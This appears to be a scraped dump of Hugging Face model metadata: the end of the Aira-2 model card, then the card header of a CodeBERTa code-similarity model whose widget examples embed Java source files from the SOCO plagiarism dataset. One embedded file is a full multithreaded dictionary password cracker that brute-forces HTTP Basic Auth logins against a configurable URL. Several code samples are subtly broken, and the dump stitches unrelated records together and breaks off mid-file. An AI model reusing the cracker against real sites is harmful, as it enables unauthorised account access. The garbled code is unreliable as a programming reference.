inputs = tokenizer(tokenizer.bos_token + question + tokenizer.sep_token,
                   add_special_tokens=False,
                   return_tensors="pt").to(device)

responses = aira.generate(**inputs, num_return_sequences=2)

print(f"Question: 👤 {question}\n")

for i, response in enumerate(responses):
    print(f'Response {i+1}: 🤖 {tokenizer.decode(response, skip_special_tokens=True).replace(question, "")}')
```
The model will output something like:
```markdown
>>>Question: 👤 What is the capital of Brazil?
>>>Response 1: 🤖 The capital of Brazil is Brasília.
>>>Response 2: 🤖 The capital of Brazil is Brasília.
```
## Limitations
- **Hallucinations:** This model can produce content that can be mistaken for truth but is, in fact, misleading or entirely false, i.e., hallucination.
- **Biases and Toxicity:** This model inherits the social and historical stereotypes from the data used to train it. Given these biases, the model can produce toxic content, i.e., harmful, offensive, or detrimental to individuals, groups, or communities.
- **Repetition and Verbosity:** The model may get stuck on repetition loops (especially if the repetition penalty during generations is set to a meager value) or produce verbose responses unrelated to the prompt it was given.
## Evaluation
|Model |Average |[ARC](https://arxiv.org/abs/1803.05457) |[TruthfulQA](https://arxiv.org/abs/2109.07958) |[ToxiGen](https://arxiv.org/abs/2203.09509) |
| ---------------------------------------------------------------------- | -------- | -------------------------------------- | --------------------------------------------- | ------------------------------------------ |
|[Aira-2-124M-DPO](https://huggingface.co/nicholasKluge/Aira-2-124M-DPO) |**40.68** |**24.66** |**42.61** |**54.79** |
|[Aira-2-124M](https://huggingface.co/nicholasKluge/Aira-2-124M) |38.07 |24.57 |41.02 |48.62 |
|GPT-2 |35.37 |21.84 |40.67 |43.62 |
|[Aira-2-355M](https://huggingface.co/nicholasKluge/Aira-2-355M) |**39.68** |**27.56** |38.53 |**53.19** |
|GPT-2-medium |36.43 |27.05 |**40.76** |41.49 |
|[Aira-2-774M](https://huggingface.co/nicholasKluge/Aira-2-774M) |**42.26** |**28.75** |**41.33** |**56.70** |
|GPT-2-large |35.16 |25.94 |38.71 |40.85 |
|[Aira-2-1B5](https://huggingface.co/nicholasKluge/Aira-2-1B5) |**42.22** |28.92 |**41.16** |**56.60** |
|GPT-2-xl |36.84 |**30.29** |38.54 |41.70 |
* Evaluations were performed using the [Language Model Evaluation Harness](https://github.com/EleutherAI/lm-evaluation-harness) (by [EleutherAI](https://www.eleuther.ai/)).
## Cite as 🤗
```bibtex
@misc{nicholas22aira,
doi = {10.5281/zenodo.6989727},
url = {https://github.com/Nkluge-correa/Aira},
author = {Nicholas Kluge Corrêa},
title = {Aira},
year = {2023},
publisher = {GitHub},
journal = {GitHub repository},
}
@phdthesis{kluge2024dynamic,
title={Dynamic Normativity},
author={Kluge Corr{\^e}a, Nicholas},
year={2024},
school={Universit{\"a}ts-und Landesbibliothek Bonn}
}
```
## License
Aira-2-355M is licensed under the Apache License, Version 2.0. See the [LICENSE](LICENSE) file for more details.
|
buelfhood/CodeBERTa-small-v1-SOCO-Java-SoftmaxLoss | buelfhood | 2025-06-09T12:09:24Z | 0 | 0 | sentence-transformers | [
"sentence-transformers",
"safetensors",
"roberta",
"sentence-similarity",
"feature-extraction",
"generated_from_trainer",
"dataset_size:30069",
"loss:SoftmaxLoss",
"dataset:buelfhood/SOCO_java",
"arxiv:1908.10084",
"base_model:huggingface/CodeBERTa-small-v1",
"base_model:finetune:huggingface/C... | sentence-similarity | 2025-06-09T12:09:11Z | ---
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- generated_from_trainer
- dataset_size:30069
- loss:SoftmaxLoss
base_model: huggingface/CodeBERTa-small-v1
widget:
- source_sentence: " \n\n\n\n\nimport java.util.*;\nimport java.io.*;\n\npublic class\
\ MyTimer\n{\t\n\n\tpublic static void main(String args[])\n\t{\n\t\tWatchdog\
\ watch = new Watchdog();\n\t\tTimer time = new Timer();\n\t\ttime.schedule(watch,864000000,864000000);\n\
\t\t\n\t\t\t\n\t}\n}\n"
sentences:
- "\n\npublic class Base64 {\n\n\nstatic public char[] encode(byte[] data)\n{\n\
\ char[] out = new char[((data.length + 2) / 3) * 4];\n\n \n \n \n\
\ \n for (int i=0, index=0; i<data.length; i+=3, index+=4) {\n boolean\
\ quad = false;\n boolean trip = false;\n\n int bat = (0xFF & (int)\
\ data[i]);\n bat <<= 8;\n if ((i+1) < data.length) {\n \
\ bat |= (0xFF & (int) data[i+1]);\n trip = true;\n }\n \
\ bat <<= 8;\n if ((i+2) < data.length) {\n bat |= (0xFF\
\ & (int) data[i+2]);\n quad = true;\n }\n out[index+3]\
\ = alphabet[(quad? ( bat & 0x3F): 64)];\n bat >>= 6;\n out[index+2]\
\ = alphabet[(trip? ( bat & 0x3F): 64)];\n bat >>= 6;\n out[index+1]\
\ = alphabet[bat & 0x3F];\n bat >>= 6;\n out[index+0] = alphabet[\
\ bat & 0x3F];\n }\n return out;\n}\n\n \nstatic public byte[] decode(char[]\
\ data)\n{\n \n \n \n \n \n \n\n int tempLen = data.length;\n\
\ for( int ix=0; ix<data.length; ix++ )\n {\n if( (data[ix] > 255)\
\ || codes[ data[ix] ] < 0 )\n --tempLen; \n }\n \n \n \
\ \n \n\n int len = (tempLen / 4) * 3;\n if ((tempLen % 4) == 3) len\
\ += 2;\n if ((tempLen % 4) == 2) len += 1;\n\n byte[] out = new byte[len];\n\
\n\n\n int shift = 0; \n int accum = 0; \n int index = 0;\n\n \
\ \n for (int ix=0; ix<data.length; ix++)\n {\n int value = (data[ix]>255)?\
\ -1: codes[ data[ix] ];\n\n if ( value >= 0 ) \n {\n\
\ accum <<= 6; \n shift += 6; \n\
\ accum |= value; \n if ( shift >= 8 ) \n\
\ {\n shift -= 8; \n out[index++]\
\ = \n (byte) ((accum >> shift) & 0xff);\n \
\ }\n }\n \n \n \n \n \n \n \
\ }\n\n \n if( index != out.length)\n {\n throw new Error(\"\
Miscalculated data length (wrote \" + index + \" instead of \" + out.length +\
\ \")\");\n }\n\n return out;\n}\n\n\n\n\n\nstatic private char[] alphabet\
\ =\n \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\"\
\n .toCharArray();\n\n\n\n\nstatic private byte[] codes = new byte[256];\n\
static {\n for (int i=0; i<256; i++) codes[i] = -1;\n for (int i = 'A';\
\ i <= 'Z'; i++) codes[i] = (byte)( i - 'A');\n for (int i = 'a'; i <=\
\ 'z'; i++) codes[i] = (byte)(26 + i - 'a');\n for (int i = '0'; i <= '9';\
\ i++) codes[i] = (byte)(52 + i - '0');\n codes['+'] = 62;\n codes['/']\
\ = 63;\n}\n}"
- "\n\n\nimport java.io.InputStream;\nimport java.util.Properties;\n\nimport javax.naming.Context;\n\
import javax.naming.InitialContext;\nimport javax.rmi.PortableRemoteObject;\n\
import javax.sql.DataSource;\n\n\n\n\n\n\npublic class MailsendPropertyHelper\
\ {\n\n\tprivate static Properties testProps;\n\n\tpublic MailsendPropertyHelper()\
\ {\n\t}\n\n\n\t\n\n\tpublic static String getProperty(String pKey){\n\t\ttry{\n\
\t\t\tinitProps();\n\t\t}\n\t\tcatch(Exception e){\n\t\t\tSystem.err.println(\"\
Error init'ing the watchddog Props\");\n\t\t\te.printStackTrace();\n\t\t}\n\t\t\
return testProps.getProperty(pKey);\n\t}\n\n\n\tprivate static void initProps()\
\ throws Exception{\n\t\tif(testProps == null){\n\t\t\ttestProps = new Properties();\n\
\n\t\t\tInputStream fis =\n\t\t\t\tMailsendPropertyHelper.class.getResourceAsStream(\"\
/mailsend.properties\");\n\t\t\ttestProps.load(fis);\n\t\t}\n\t}\n}\n\n\n\n\n\n"
- "\n\nimport java.util.*;\nimport java.*;\nimport java.awt.*;\nimport java.net.*;\n\
import java.io.*;\nimport java.text.*;\n\npublic class Dictionary {\n \n \
\ \n \n public static String Base64Encode(String s) {\n byte[] bb\
\ = s.getBytes();\n byte[] b = bb;\n char[] table = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',\n\
\ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z',\n\
\ '0','1','2','3','4','5','6','7','8','9','+','/' };\n if (bb.length\
\ % 3!=0) {\n int x1 = bb.length;\n \n b = new\
\ byte[(x1/3+1)*3];\n int x2 = b.length;\n \n \
\ for(int i=0;i<x1;i++)\n b[i] = bb[i];\n for(int i=x1;i<x2;i++)\n\
\ b[i] = 0;\n }\n \n char[] c = new char[b.length/3*4];\n\
\ \n int i=0, j=0;\n while (i+3<=b.length) {\n \
\ c[j] = table[(b[i] >> 2)];\n c[j+1] = table[(b[i+1] >>\
\ 4) | ((b[i] & 3) << 4)];\n c[j+2] = table[(b[i+2] >> 6) |\
\ ((b[i+1] & 15) << 2)];\n c[j+3] = table[(b[i+2] & 63)];\n \
\ i+=3;\n j+=4;\n }\n \n j = c.length-1;\n\
\ while (c[j]=='A') {\n c[j]='=';\n j--;\n \
\ }\n \n return String.valueOf(c);\n }\n \n \n public\
\ synchronized void getAccumulatedLocalAttempt() {\n attempt = 0;\n \
\ for (int i=0;i<MAXTHREAD;i++) {\n attempt += threads[i].getLocalAttempt();\n\
\ }\n }\n \n \n public synchronized void printStatusReport(String\
\ Attempt, String currprogress,String ovrl, double[] attmArr, int idx) {\n \
\ DecimalFormat fmt = new DecimalFormat();\n fmt.applyPattern(\"0.00\"\
);\n \n System.out.println();\n System.out.println(\" ------------------------\
\ [ CURRENT STATISTICS ] ---------------------------\");\n System.out.println();\n\
\ System.out.println(\" Current connections : \"+curconn);\n \
\ System.out.println(\" Current progress : \"+attempt+ \" of \"+ALLCOMBI+\"\
\ (\"+currprogress+\"%)\");\n System.out.println(\" Overall Attempts rate\
\ : \"+ovrl+\" attempts second (approx.)\");\n System.out.println();\n\
\ System.out.println(\" ---------------------------------------------------------------------------\"\
);\n System.out.println();\n }\n \n \n public class MyTT extends\
\ TimerTask {\n \n public synchronized void run() {\n \
\ \n \n if (count==REPORT_INTERVAL) {\n \
\ \n DecimalFormat fmt = new DecimalFormat();\n \
\ fmt.applyPattern(\"0.00\");\n \n \n \
\ getAccumulatedLocalAttempt();\n double p = (double)attempt/(double)ALLCOMBI*100;\n\
\ \n \n double aps = (double) (attempt\
\ - attm) / REPORT_INTERVAL;\n \n \n \
\ attmArr[attmArrIdx++] = aps;\n \n \n \
\ printStatusReport(String.valueOf(attempt),fmt.format(p),fmt.format(getOverallAttemptPerSec()),attmArr,attmArrIdx);\n\
\ count = 0;\n } else\n \n \
\ if (count==0) {\n getAccumulatedLocalAttempt();\n \
\ attm = attempt;\n count++;\n \
\ } else {\n count++;\n }\n }\n \
\ \n \n \n public synchronized double getOverallAttemptPerSec()\
\ {\n double val = 0;\n \n if (attmArrIdx==0)\
\ {\n return attmArrIdx;\n } else {\n \
\ for (int i=0;i<attmArrIdx;i++) {\n val+= attmArr[i];\n\
\ }\n return val / attmArrIdx;\n }\n\
\ }\n \n private int count = 0;\n private \
\ int attm;\n private int attmArrIdx = 0;\n private double[]\
\ attmArr = new double[2*60*60/10]; \n }\n \n \n public synchronized\
\ void interruptAll(int ID) {\n for (int i=0;i<MAXTHREAD;i++) {\n \
\ if ((threads[i].isAlive()) && (i!=ID)) {\n threads[i].interrupt();\n\
\ }\n notifyAll();\n }\n }\n \n \n \n\
\ public synchronized void setSuccess(int ID, String p) {\n passw \
\ = p;\n success = ID;\n notifyAll();\n interruptAll(ID);\n\
\ \n \n end = System.currentTimeMillis();\n }\n \n\
\ \n public synchronized boolean isSuccess() {\n return (success>=0);\n\
\ }\n \n \n \n public synchronized void waitUntilAllTerminated()\
\ {\n while (curconn>0) {\n try {\n wait();\n\
\ } catch (InterruptedException e) {}\n }\n }\n \n \
\ \n \n \n public synchronized int waitUntilOK2Connect() {\n boolean\
\ interruptd= false;\n int idx = -1;\n \n \n \n \
\ \n while (curconn>=MAXCONN) {\n try {\n \
\ wait();\n } catch (InterruptedException e) { interruptd = true;\
\ }\n }\n \n \n \n if (!interruptd) {\n \
\ \n curconn++;\n for (idx=0;idx<MAXCONN;idx++)\n\
\ if (!connused[idx]) {\n connused[idx] = true;\n\
\ break;\n }\n \n notifyAll();\n\
\ }\n \n \n return idx;\n }\n \n \n public\
\ synchronized void decreaseConn(int idx) {\n curconn--;\n connused[idx]\
\ = false;\n \n \n notifyAll();\n }\n \n \n \n\
\ \n public String[] fetchWords( int idx,int n) {\n String[] result\
\ = new String[n];\n try {\n \n BufferedReader b\
\ = new BufferedReader(new FileReader(TEMPDICT));\n \n for\
\ (int i=0;i<idx;i++) { b.readLine(); }\n \n for (int i=0;i<n;i++)\
\ {\n result[i] = b.readLine();\n }\n \n\
\ b.print();\n } catch (FileNotFoundException e) {\n \
\ System.out.println(e);\n System.exit(0);\n } catch (IOException\
\ e) {}\n return result;\n }\n \n \n public String fetchWord(\
\ int idx) {\n String result = null;\n try {\n \n \
\ BufferedReader b = new BufferedReader(new FileReader(TEMPDICT));\n \
\ \n for (int i=0;i<idx;i++) { b.readLine(); }\n \
\ \n result = b.readLine();\n \n b.print();\n\
\ } catch (FileNotFoundException e) {\n System.out.println(e);\n\
\ System.exit(0);\n } catch (IOException e) {}\n return\
\ result;\n }\n \n \n public static void readThroughDictionary() {\n\
\ try {\n \n BufferedReader b = new BufferedReader(new\
\ FileReader(DICTIONARY));\n PrintWriter w = new PrintWriter(new\
\ BufferedWriter(new FileWriter(TEMPDICT)));\n String s;\n \
\ \n ALLCOMBI = 0;\n while ((s=b.readLine())!=null) {\n\
\ if ((s.length()>=MINCHAR) && (s.length()<=MAXCHAR)) {\n \
\ w.println(s);\n ALLCOMBI++;\n \
\ }\n }\n b.print();\n w.print();\n \
\ } catch (FileNotFoundException e) {\n System.out.println(\"Unable\
\ open the DICTIONARY file '\"+DICTIONARY+\"'\");\n System.exit(0);\n\
\ } catch (IOException e) {\n System.out.println(\"Error in\
\ the DICTIONARY file '\"+DICTIONARY+\"'\");\n System.exit(0);\n \
\ }\n }\n \n \n \n \n \n public class ThCrack extends\
\ Thread {\n \n \n public ThCrack(int threadID, int startidx,\
\ int endidx) {\n super(\" Thread #\"+String.valueOf(threadID)+\":\
\ \");\n this.ID = threadID;\n this.startidx = startidx;\n\
\ this.endidx = endidx;\n \n \n \
\ if (endidx>=startidx+MAXCACHE-1) {\n this.localDict = new String[MAXCACHE];\n\
\ this.localDict = fetchWords(startidx,MAXCACHE);\n \
\ lastFetchIdx = startidx+MAXCACHE-1;\n } else {\n \
\ this.localDict = new String[(int)(endidx-startidx+1)];\n \
\ this.localDict = fetchWords(startidx,(int)(endidx-startidx+1));\n \
\ lastFetchIdx = endidx;\n }\n \n setDaemon(true);\n\
\ }\n \n \n public boolean launchRequest(String ID,\
\ int connID,String thePass) throws IOException, InterruptedException {\n \
\ int i;\n String msg;\n \n \n \
\ URL tryURL = new URL(THEURL);\n \n \n connections[connID]=(HttpURLConnection)\
\ tryURL.openConnection();\n \n \n connections[connID].setRequestProperty(\"\
Authorization\",\" \"+Base64Encode(USERNAME+\":\"+thePass));\n \n \
\ \n i = connections[connID].getResponseCode();\n \
\ msg = connections[connID].getResponseMessage();\n connections[connID].disconnect();\n\
\ \n \n if (i==HttpURLConnection.HTTP_OK) {\n\
\ \n System.out.println(ID+\"Trying '\"+thePass+\"\
' GOTCHA !!! (= \"+String.valueOf()+\"-\"+msg+\").\");\n setSuccess(this.ID,thePass);\n\
\ return (true);\n } else {\n \n \
\ System.out.println(ID+\"Trying '\"+thePass+\"' FAILED (= \"+String.valueOf()+\"\
-\"+msg+\").\");\n return (false);\n }\n }\n\
\ \n \n public void rest(int msec) {\n try { sleep(msec);\
\ } catch (InterruptedException e) {}\n }\n \n \n \
\ public String getCacheIdx(int idx) {\n if (idx<=lastFetchIdx) {\n\
\ return localDict[localDict.length-(int)(lastFetchIdx-idx)-1];\n\
\ } else {\n if (lastFetchIdx+localDict.length-1>endidx)\
\ {\n this.localDict = fetchWords(lastFetchIdx+1,(int)(endidx-lastFetchIdx-1));\n\
\ lastFetchIdx = endidx;\n } else {\n \
\ this.localDict = fetchWords(lastFetchIdx+1,localDict.length);\n\
\ lastFetchIdx = lastFetchIdx+localDict.length;\n \
\ }\n return localDict[localDict.length-(int)(lastFetchIdx-idx)-1];\n\
\ }\n }\n \n \n \n public String\
\ constructPassword(int idx) {\n return getCacheIdx(idx);\n \
\ }\n \n \n public String getStartStr() {\n return\
\ fetchWord(this.startidx);\n }\n \n \n public String\
\ getEndStr() {\n return fetchWord(this.endidx);\n }\n \
\ \n \n public void run() {\n i = startidx;\n \
\ boolean keeprunning = true;\n while ((!isSuccess()) && (i<=endidx)\
\ && (keeprunning)) {\n \n \n int\
\ idx = waitUntilOK2Connect();\n \n \n \
\ if (idx==-1) {\n \n break;\n \
\ }\n \n try {\n \
\ \n String s = constructPassword(i);\n \
\ \n if ((s.length()>=MINCHAR) && (s.length()<=MAXCHAR))\n\
\ launchRequest(getName(), idx, s);\n \
\ else\n System.out.println(getName()+\"skipping '\"\
+s+\"'\");\n \n decreaseConn(idx);\n \
\ \n localattempt++;\n \n\
\ \n rest(MAXCONN);\n \
\ i++;\n } catch (InterruptedException e) {\n \
\ \n \n keeprunning = false;\n \
\ break;\n } catch (IOException e) {\n \
\ \n \n \n \n\
\ \n decreaseConn(idx);\n \
\ }\n }\n \n \n if (success==this.ID)\
\ {\n waitUntilAllTerminated();\n }\n }\n \
\ \n \n public int getLocalAttempt() {\n return localattempt;\n\
\ }\n \n private int startidx,endidx;\n private int\
\ ID;\n private int localattempt = 0;\n private String localDict[];\
\ \n private int lastFetchIdx;\n }\n \n \n public void printProgramHeader(String\
\ mode,int nThread) {\n System.out.println();\n System.out.println(\"\
\ ********************** [ DICTIONARY CRACKING SYSTEM ] *********************\"\
);\n System.out.println();\n System.out.println(\" URL \
\ : \"+THEURL);\n System.out.println(\" Crack Mode : \"+mode);\n \
\ System.out.println(\" . Char : \"+MINCHAR);\n System.out.println(\"\
\ . Char : \"+MAXCHAR);\n System.out.println(\" # of Thread : \"+nThread);\n\
\ System.out.println(\" Connections : \"+MAXCONN);\n System.out.println(\"\
\ All Combi. : \"+ALLCOMBI);\n System.out.println();\n System.out.println(\"\
\ ***************************************************************************\"\
);\n System.out.println();\n }\n \n \n public void startNaiveCracking()\
\ {\n MAXTHREAD = 1;\n MAXCONN = 1;\n startDistCracking();\n\
\ }\n \n \n public void startDistCracking() {\n int startidx,endidx;\n\
\ int thcount;\n \n \n if (isenhanced) {\n \
\ printProgramHeader(\"ENHANCED DICTIONARY CRACKING ALGORITHM\",MAXTHREAD);\n\
\ } else {\n printProgramHeader(\"NAIVE DICTIONARY CRACKING\
\ ALGORITHM\",MAXTHREAD);\n }\n \n \n \n \n\
\ \n \n \n \n if (MAXTHREAD>ALLCOMBI) { MAXTHREAD\
\ = (int) (ALLCOMBI); }\n mult = (ALLCOMBI) / MAXTHREAD;\n \n \
\ \n i = System.currentTimeMillis();\n \n \n \
\ for (thcount=0;thcount<MAXTHREAD-1;thcount++) {\n startidx = thcount*mult;\n\
\ endidx = (thcount+1)*mult-1;\n threads[thcount] = new\
\ ThCrack(thcount, startidx, endidx);\n System.out.println(threads[thcount].getName()+\"\
\ try crack from '\"+threads[thcount].getStartStr()+\"' '\"+threads[thcount].getEndStr()+\"\
'\");\n }\n \n \n \n \n \n startidx\
\ = (MAXTHREAD-1)*mult;\n endidx = ALLCOMBI-1;\n threads[MAXTHREAD-1]\
\ = new ThCrack(MAXTHREAD-1, startidx, endidx);\n System.out.println(threads[MAXTHREAD-1].getName()+\"\
\ try crack from '\"+threads[MAXTHREAD-1].getStartStr()+\"' '\"+threads[MAXTHREAD-1].getEndStr()+\"\
'\");\n \n System.out.println();\n System.out.println(\"\
\ ***************************************************************************\"\
);\n System.out.println();\n \n \n for (int i=0;i<MAXTHREAD;i++)\n\
\ threads[i].print();\n }\n \n \n public Dictionary() {\n\
\ \n if (isenhanced) {\n startDistCracking();\n \
\ } else {\n startNaiveCracking();\n }\n \n \
\ \n reportTimer = new java.util.Timer();\n MyTT tt = new\
\ MyTT();\n reportTimer.schedule(tt,0,1000);\n \n \n \
\ while ((success==-1) && (attempt<ALLCOMBI)) {\n try { Thread.sleep(100);\
\ getAccumulatedLocalAttempt(); } catch (InterruptedException e) { }\n \
\ }\n \n \n if (success==-1) {\n end = System.currentTimeMillis();\n\
\ }\n \n \n getAccumulatedLocalAttempt();\n \
\ \n double ovAps = tt.getOverallAttemptPerSec();\n DecimalFormat\
\ fmt = new DecimalFormat();\n fmt.applyPattern(\"0.00\");\n \n\
\ \n reportTimer.cancel();\n \n \n try { Thread.sleep(1000);\
\ } catch (InterruptedException e) { }\n \n \n synchronized\
\ (this) {\n if (success>=0) {\n System.out.println();\n\
\ System.out.println(\" ********************* [ URL SUCCESSFULLY\
\ CRACKED !! ] *********************\");\n System.out.println();\n\
\ System.out.println(\" The password is : \"+passw);\n \
\ System.out.println(\" Number of attempts : \"+attempt+\" of \"\
+ALLCOMBI+\" total combinations\");\n System.out.println(\" Attempt\
\ position : \"+fmt.format((double)attempt/(double)ALLCOMBI*100)+\"%\");\n\
\             System.out.println(\" Overall attempt rate : \"+fmt.format(ovAps)+\
\ \" attempts/sec\");\n System.out.println(\" Cracking time \
\ : \"+String.valueOf(((double)end-(double)d)/1000) + \" seconds\");\n \
\             System.out.println(\" Worst-case time estd : \"+fmt.format(1/ovAps*ALLCOMBI)+\
\ \" seconds\");\n System.out.println();\n System.out.println(\"\
\ ***************************************************************************\"\
);\n System.out.println();\n } else {\n \
\ System.out.println();\n System.out.println(\" *********************\
\ [ UNABLE CRACK THE URL !!! ] *********************\");\n System.out.println();\n\
\ System.out.println(\" Number of attempts : \"+attempt+\" of\
\ \"+ALLCOMBI+\" total combinations\");\n System.out.println(\"\
\ Attempt position : \"+fmt.format((double)attempt/(double)ALLCOMBI*100)+\"\
%\");\n System.out.println(\" Overal attempt rate : \"+fmt.format(ovAps)+\
\ \" attempts/sec\");\n System.out.println(\" Cracking time \
\ : \"+String.valueOf(((double)end-(double)d)/1000) + \" seconds\");\n \
\ System.out.println();\n System.out.println(\" ***************************************************************************\"\
);\n System.out.println();\n }\n }\n }\n \
\ \n \n public static void printSyntax() {\n System.out.println();\n\
\ System.out.println(\"Syntax : Dictionary [mode] [URL] [] [] [username]\"\
);\n System.out.println();\n System.out.println(\" mode :\
\ (opt) 0 - NAIVE Dictionary mode\");\n System.out.println(\" \
\ (trying from the first the last combinations)\");\n System.out.println(\"\
\ 1 - ENHANCED Dictionary mode\");\n System.out.println(\"\
\ (dividing cracking jobs multiple threads) (default)\"\
);\n System.out.println(\" URL : (opt) the URL crack \");\n \
\ System.out.println(\" (default : http://sec-crack.cs.rmit.edu./SEC/2/index.php)\"\
);\n System.out.println(\" , : (optional) range of characters applied\
\ in the cracking\");\n System.out.println(\" where\
\ 1 <= <= 255 (default = 1)\");\n System.out.println(\" \
\ <= <= 255 (default = 3)\");\n System.out.println(\"\
\ username : (optional) the username that is used crack\");\n System.out.println();\n\
\ System.out.println(\" NOTE: The optional parameters '','', and 'username'\"\
);\n System.out.println(\" have specified altogether none at\
\ all.\");\n System.out.println(\" For example, if [] is specified,\
\ then [], and [username]\");\n System.out.println(\" have specified\
\ as well. If none of them specified,\");\n System.out.println(\" \
\ default values used.\");\n System.out.println();\n System.out.println(\"\
\ Example of invocation :\");\n System.out.println(\" java Dictionary\
\ \");\n System.out.println(\" java Dictionary 0\");\n System.out.println(\"\
\ java Dictionary 1 http://localhost/tryme.php\");\n System.out.println(\"\
\ java Dictionary 0 http://localhost/tryme.php 1 3 \");\n System.out.println(\"\
\ java Dictionary 1 http://localhost/tryme.php 1 10 \");\n System.out.println();\n\
\ System.out.println();\n }\n \n \n public static void paramCheck(String[]\
\ args) {\n int argc = args.length;\n \n \n try {\n\
\ switch (Integer.valueOf(args[0]).intValue()) {\n case\
\ 0: {\n isenhanced = false;\n } break;\n \
\ case 1: {\n isenhanced = true;\n \
\ } break;\n default:\n System.out.println(\"\
Syntax error : invalid mode '\"+args[0]+\"'\");\n printSyntax();\n\
\ System.exit(1);\n }\n } catch (NumberFormatException\
\ e) {\n System.out.println(\"Syntax error : invalid number '\"+args[0]+\"\
'\");\n printSyntax();\n System.exit(1);\n }\n \
\ \n if (argc>1) {\n try {\n \n \
\ URL u = new URL(args[1]);\n \n \n \
\ try {\n HttpURLConnection conn = (HttpURLConnection)\
\ u.openConnection();\n \n switch (conn.getResponseCode())\
\ {\n case HttpURLConnection.HTTP_ACCEPTED:\n \
\ case HttpURLConnection.HTTP_OK:\n case \
\ HttpURLConnection.HTTP_NOT_AUTHORITATIVE:\n case HttpURLConnection.HTTP_FORBIDDEN:\n\
\ case HttpURLConnection.HTTP_UNAUTHORIZED:\n \
\ break;\n default:\n \
\ \n \n System.out.println(\"\
Unable open connection the URL '\"+args[1]+\"'\");\n \
\ System.exit(1);\n }\n } catch (IOException\
\ e) {\n System.out.println(e);\n System.exit(1);\n\
\ }\n \n THEURL = args[1];\n \
\ } catch (MalformedURLException e) {\n \n \
\ System.out.println(\"Invalid URL '\"+args[1]+\"'\");\n printSyntax();\n\
\ System.exit(1);\n }\n }\n \n \
\ \n if (argc==5) {\n try {\n MINCHAR = Integer.valueOf(args[2]).intValue();\n\
\ } catch (NumberFormatException e) {\n System.out.println(\"\
Invalid range number value '\"+args[2]+\"'\");\n printSyntax();\n\
\ System.exit(1);\n }\n \n try\
\ {\n MAXCHAR = Integer.valueOf(args[3]).intValue();\n \
\ } catch (NumberFormatException e) {\n System.out.println(\"\
Invalid range number value '\"+args[3]+\"'\");\n printSyntax();\n\
\ System.exit(1);\n }\n \n if\
\ ((MINCHAR<1) || (MINCHAR>255)) {\n System.out.println(\"Invalid\
\ range number value '\"+args[2]+\"' (must between 0 and 255)\");\n \
\ printSyntax();\n System.exit(1);\n } else\n\
\ if (MINCHAR>MAXCHAR) {\n System.out.println(\"\
Invalid range number value '\"+args[2]+\"' (must lower than the value)\");\n\
\ printSyntax();\n System.exit(1);\n \
\ }\n \n if (MAXCHAR>255) {\n \
\ System.out.println(\"Invalid range number value '\"+args[3]+\"' (must between\
\ value and 255)\");\n printSyntax();\n System.exit(1);\n\
\ }\n \n USERNAME = args[4];\n } else\n\
\ if ((argc>2) && (argc<5)) {\n System.out.println(\"\
Please specify the [], [], and [username] altogether none at all\");\n \
\ printSyntax();\n System.exit(1);\n } else\n\
\ if ((argc>2) && (argc>5)) {\n System.out.println(\"\
The number of parameters expected is not more than 5. \");\n \
\ System.out.println(\" have specified more than 5 parameters.\");\n \
\ printSyntax();\n System.exit(1);\n \
\ }\n }\n \n public static void main(String[] args) {\n MINCHAR\
\ = 1;\n MAXCHAR = 3; \n \n \n if (args.length==0)\
\ {\n args = new String[5];\n args[0] = String.valueOf(1);\
\ \n args[1] = THEURL;\n args[2] = String.valueOf(MINCHAR);\n\
\ args[3] = String.valueOf(MAXCHAR);\n args[4] = USERNAME;\n\
\ }\n \n \n paramCheck(args);\n \n \n\
\ readThroughDictionary();\n \n \n Application = new\
\ Dictionary();\n }\n \n public static Dictionary Application;\n public\
\ static String THEURL\t\t= \"http://sec-crack.cs.rmit.edu./SEC/2/index.php\"\
;\n public static String DICTIONARY = System.getProperty(\"user.dir\"\
)+\"/words\";\n public static String TEMPDICT = System.getProperty(\"\
user.dir\")+\"/~words\";\n public static boolean isenhanced;\t\t\n public\
\ static String passw\t\t= \"\";\t\n \n public static final int REPORT_INTERVAL\
\ = 1; \n public static int MAXTHREAD = 50; \n public static\
\ int MAXCONN = 50; \n public static int\t curconn = 0;\
\ \n public static int success = -1; \n \n public\
\ static String USERNAME = \"\"; \n public static int MINCHAR; \
\ \n public static int MAXCHAR; \n public\
\ static int ALLCOMBI; \n \n public static int start\
\ ,end; \n public static int MAXCACHE = 100; \n \
\ \n public static java.util.Timer reportTimer; \n public static HttpURLConnection\
\ connections[] = new HttpURLConnection[MAXCONN]; \n public static boolean\t\
\ connused[]\t = new boolean[MAXCONN]; \n public ThCrack[]\
\ threads = new ThCrack[MAXTHREAD]; \n public static\
\ int attempt = 0; \n public static int idxLimit;\t\t\
\ \n}\n"
- source_sentence: "\nimport java.net.*;\nimport java.io.*;\nimport java.misc.*;\n\
import java.io.BufferedInputStream;\nimport java.awt.*;\nimport java.awt.event.*;\n\
\npublic class WriteFile\n{\n String url;\n String fileName;\n int flag;\n\
\ private PrintWriter out2;\n private TextArea response;\n int status;\n\
\ int mailFlag;\n\n public WriteFile (String newUrl, String newFileName, int\
\ newFlag)\n {\n url = newUrl;\n fileName = newFileName;\n \
\ PrintWriter printW = null;\n FileOutputStream fout;\n flag = newFlag;\n\
\ status = 0;\n mailFlag = 0;\n\n \n File file = new File(fileName);\n\
\ file.delete();\n\n try\n {\n fout = new FileOutputStream(fileName,true);\n\
\ printW = new PrintWriter(fout);\n }\n catch (IOException\
\ ioe)\n {\n System.out.println(\"IO Error : \" + ioe);\n \
\ }\n\n\n URL u;\n URLConnection uc;\n\n try\n {\n \
\ u = new URL(url);\n try\n {\n \n \
\ uc = u.openConnection();\n\n InputStream content = (InputStream)uc.getInputStream();\n\
\ BufferedReader in = new BufferedReader (new InputStreamReader(content));\n\
\n String line;\n\n \n while ((line = in.readLine())\
\ != null)\n {\n \n printW.println(line);\n\
\n }\n }\n catch (Exception e)\n {\n \
\ System.out.println(\"Error: \" + e);\n }\n }\n \
\ catch (MalformedURLException e)\n {\n System.out.println(url\
\ + \" is not a parseable URL\");\n }\n \n printW.print();\n\
\n\n if(flag == 1)\n {\n \n compareDiff(\"@.rmit.edu.\"\
);\n }\n }\n\n String loadStream(InputStream in) throws IOException\n\
\ {\n int ptr = 0;\n in = new BufferedInputStream(in);\n \
